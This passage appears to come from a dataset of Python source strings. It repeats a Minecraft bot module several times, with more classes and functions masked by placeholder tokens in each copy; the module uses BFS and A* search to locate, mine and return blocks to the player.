deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass _ImaginaryBot(_GenericBot):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Bot(_GenericBot):\n <docstring token>\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Bot(_GenericBot):\n <docstring token>\n <assignment token>\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Bot(_GenericBot):\n <docstring token>\n <assignment token>\n <function token>\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Bot(_GenericBot):\n <docstring token>\n <assignment token>\n <function token>\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n 